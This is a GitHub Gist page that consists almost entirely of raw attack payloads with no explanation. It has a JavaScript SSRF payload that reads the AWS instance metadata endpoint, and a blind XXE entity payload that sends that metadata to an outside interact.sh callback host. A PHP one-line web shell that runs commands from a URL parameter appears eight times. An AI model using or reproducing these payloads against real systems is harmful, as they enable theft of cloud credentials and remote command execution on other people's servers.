Skip to content

Instantly share code, notes, and snippets.

View rv0x00's full-sized avatar
💭
Busy

Rohit Verma rv0x00

💭
Busy
View GitHub Profile
x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’http://169.254.169.254/latest/meta-data/hostname’);x.send();
<!ENTITY % data SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY % inception "<!ENTITY exfil SYSTEM 'http://cb1tq0w2vtc000017n40gfo7mooyyyyyb.interact.sh/data?%data;'>">
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_GET['cmd']); ?>